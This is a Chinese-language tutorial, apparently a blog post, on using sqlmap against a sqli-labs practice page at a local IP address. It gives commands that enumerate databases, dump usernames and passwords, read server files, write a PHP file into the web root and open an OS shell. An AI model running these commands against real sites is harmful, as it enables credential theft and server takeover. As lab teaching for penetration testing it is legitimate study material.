注入工具 -- sqlmap(枚举信息)

简介: 注入工具 -- sqlmap(枚举信息)

一、列举数据库名


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --dbs

0a2653c851af460fa595bd959398a8f1.png


二、列举数据库表


qlmap -u “http://192.168.1.121/sqli/Less-1/?id=1”-D security --tables

0eacb84100b54626af849e6b562bf92a.png


三、列举数据库列名


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -D security -T users --columns

2d65d23f6d4748949b924e4057485923.png


四、列举数据值


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -D security -T users -C “password,username” --dump

2e9b90b2ca334476abebe75bafe6eeaa.png


五、列举schema信息,


–exclude-sysdbs 排除系统数据库

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --schema --exclude-sysdb

4cebaac233b3433da32a72337a77fc60.png


六、检索表中数据的数量


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --count --exclude-sysdbs

6de278e6d6694ce5bb08e7e842b7e74b.png


七、暴力破解数据


mysql<5.0时,没有information_schema,所以用–common-tables,–common-columns获取表名和列名,需要自己导入字典

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -D security --common-tables


八、读取文件,


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --file-read=“C:\phpStudy\PHPTutorial\WWW\index.php”

7a399525ddec4b77923c464820b33738 (1).png


九、写入文件


–file-write 本地文件

–file-dest 远程写入文件

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --file-write="/root/.sqlmap/output/192.168.1.121/files/123" --file-dest=“C:\phpStudy\PHPTutorial\WWW\321.php”


十、检索所有信息


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -a


十一、执行系统个命令


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --os-shell

7a399525ddec4b77923c464820b33738.png


禁止非法,后果自负

目录
相关文章
|
6月前
|
SQL
注入工具 -- sqlmap(自定义检测参数)
注入工具 -- sqlmap(自定义检测参数)
65 0
【干货】sql-labs、请求方式、注入类型、拼接方式
【干货】sql-labs、请求方式、注入类型、拼接方式
|
6月前
|
关系型数据库 MySQL
Mysql注入 -- 注入类型
Mysql注入 -- 注入类型
43 1
|
6月前
|
SQL 关系型数据库 MySQL
注入工具 -- sqlmap(注入参数)
注入工具 -- sqlmap(注入参数)
105 0
|
6月前
|
SQL
​注入工具 -- sqlmap(获取目标)
​注入工具 -- sqlmap(获取目标)
57 0
|
6月前
|
Web App开发 数据安全/隐私保护 iOS开发
注入工具 -- sqlmap(设置请求参数)
注入工具 -- sqlmap(设置请求参数)
76 0
|
SQL 关系型数据库 MySQL
SpringBoot自定义配置注入的方式:自定义配置文件注入,从mysql读取配置进行注入
SpringBoot自定义配置注入的方式:自定义配置文件注入,从mysql读取配置进行注入
293 0
|
6月前
|
安全 Python
注入工具 -- DSSS
注入工具 -- DSSS
51 0
|
6月前
注入工具 -- sqlmap(指定位置注入和优化性能)
注入工具 -- sqlmap(指定位置注入和优化性能)
79 0
|
6月前
|
数据库 数据安全/隐私保护 数据库管理
注入工具 -- sqlmap(检索DBMS信息)
注入工具 -- sqlmap(检索DBMS信息)
231 0